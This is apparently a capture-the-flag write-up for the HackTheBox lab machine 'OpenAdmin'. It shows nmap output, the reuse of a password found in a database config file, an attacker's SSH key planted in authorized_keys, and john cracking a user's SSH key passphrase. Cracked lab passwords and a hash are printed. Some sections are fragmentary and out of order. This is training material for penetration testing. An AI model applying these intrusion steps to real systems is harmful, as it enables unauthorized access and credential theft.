OpenAdmin is a 20 pts box on HackTheBox and it is rated as “Easy”. It has a web application running that is vulnerable to Remote Code Execution. There is a web server running locally on the box. After gathering some credentials and enumeration, an attacker is able to comprimise all the users on the box. One of the users has a sudo entry with root privileges and it allows escalation of privileges to root.
Initial enumeration
As always I start with nmap
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
λ ~/Desktop/htb/machines/openadmin nmap -sVSC -T5 10.10.10.171 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 01:40 EDT Nmap scan report for 10.10.10.171 Host is up (0.15s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.77 seconds
www-data@openadmin:/opt/ona/www$ ls -alh /home ls -alh /home total 16K drwxr-xr-x 4 root root 4.0K Nov 22 18:00 . drwxr-xr-x 24 root root 4.0K Nov 21 13:41 .. drwxr-x--- 5 jimmy jimmy 4.0K May 1 19:22 jimmy drwxr-x--- 6 joanna joanna 4.0K Nov 28 09:37 joanna
Started searching for configuration files, as they might contain something juicy
The credential I found on database configuration file worked for jimmy.
1 2 3 4 5 6 7
www-data@openadmin:/opt/ona/www/local/config$ su jimmy su jimmy Password: n1nj4W4rri0R!
jimmy@openadmin:/opt/ona/www/local/config$ id id uid=1000(jimmy) gid=1000(jimmy) groups=1000(jimmy),1002(internal)
But it wasn’t enough still
There was a web application on the box that is running locally
1 2 3 4 5 6 7 8 9 10 11 12 13
jimmy@openadmin:/home$ netstat -tulpn netstat -tulpn (Not all processes could be identified, non-owned process info will not be shown, you would have to be root to see it all.) Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:52846 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - udp 0 0 127.0.0.53:53 0.0.0.0:* -
1 2 3 4 5 6 7 8
jimmy@openadmin:/var/www/internal$ ls -alh ls -alh total 20K drwxrwx--- 2 jimmy internal 4.0K May 1 19:19 . drwxr-xr-x 4 root root 4.0K Nov 22 18:15 .. -rwxrwxr-x 1 jimmy internal 3.2K Nov 22 23:24 index.php -rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php -rwxrwxr-x 1 jimmy internal 339 Apr 30 19:46 main.php
λ ~/Desktop/htb/machines/openadmin ssh-keygen Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /root/Desktop/htb/machines/openadmin/id_rsa Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /root/Desktop/htb/machines/openadmin/id_rsa Your public key has been saved in /root/Desktop/htb/machines/openadmin/id_rsa.pub The key fingerprint is: SHA256:wsdH4xOZDA93ua1gCiq5ay+XVzjELHSuqvqjRZS5+2w root@kali The key's randomart image is: +---[RSA 3072]----+ | o . .. | | o. . * +. | | +. = O o | | . ...*. ooo. . | | o. =ooSo+. . | | .o.o ooo. .. | | o+ . o | | .*oE . | |==oB+. | +----[SHA256]-----+
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
jimmy@openadmin:~$ ls -alh ls -alh total 48K drwxr-x--- 5 jimmy jimmy 4.0K May 1 19:22 . drwxr-xr-x 4 root root 4.0K Nov 22 18:00 .. lrwxrwxrwx 1 jimmy jimmy 9 Nov 21 14:07 .bash_history -> /dev/null -rw-r--r-- 1 jimmy jimmy 220 Apr 4 2018 .bash_logout -rw-r--r-- 1 jimmy jimmy 3.7K Apr 4 2018 .bashrc drwx------ 2 jimmy jimmy 4.0K Nov 21 13:52 .cache drwx------ 3 jimmy jimmy 4.0K May 1 18:06 .gnupg drwxrwxr-x 3 jimmy jimmy 4.0K Nov 22 23:15 .local -rw-r--r-- 1 jimmy jimmy 807 Apr 4 2018 .profile -rw------- 1 jimmy jimmy 14K May 1 19:22 .viminfo jimmy@openadmin:~$ mkdir .ssh mkdir .ssh jimmy@openadmin:~$ cd .ssh cd .ssh jimmy@openadmin:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4qpQ8HRU4yn/wY09z9u0CPXU0I70xhFmlCGV+oadHST4eP6XVAYckDPdxRv7R8QTTnA7qyaUsFJx6rNk/3p20mzf51myUqVpKwk0GawVS3K3QbciciRcKIXob1w4Vwf1PV0Mbf1cit87eOFnxxNDi1iRe3WVFWVKqExJOFJw0yfdf/l8UEfmeJLZkZKcac745lU/SEBJfAFXIjdH4m+weAVQlfE/kVjJOEpxm/uv3tpdDCd74LCbIpL8NQTk2Wrh+WoITkKQuqqDeI1wNX+A4G9NvroSB6qP3v/i+GFTIgOqNdAFNF6kUxyANIW/o84Row9utXMWSg4KVn8XOANeqTqLFcsWqm1E6THsiEhyLhei4Ho5j0FQLTumM4DsBXNOq2x4jNtGDj1xVC8aK8SjVHmzlmgRvf2mzgu3UCuSrFQPqbMc9jYZIizAu2/eli5t4CISY+a4NZHGMU3KoLxQB15H50B/ct0NgKOUb1t0Ec8gr3vPEWYLAVUF2XmQ2HgU= root@kali" > authorized_keys <gr3vPEWYLAVUF2XmQ2HgU= root@kali" > authorized_keys
I logged in with the credential I found, jimmy:Revealed
Cracking the ssh key
1 2
λ ~/Desktop/htb/machines/openadmin /usr/share/john/ssh2john.py joanna.rsa | tee joanna.rsa.hash joanna.rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d
1 2 3 4 5 6 7 8 9 10 11 12 13
λ ~/Desktop/htb/machines/openadmin john joanna.rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 4 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status bloodninjas (joanna.rsa) Warning: Only 2 candidates left, minimum 4 needed for performance. 1g 0:00:00:03 DONE (2020-05-02 02:36) 0.2915g/s 4181Kp/s 4181Kc/s 4181KC/sa6_123..*7¡Vamos! Session completed
bloodninjas
Elevating to root
I run linpeas and it simply showed the way to root.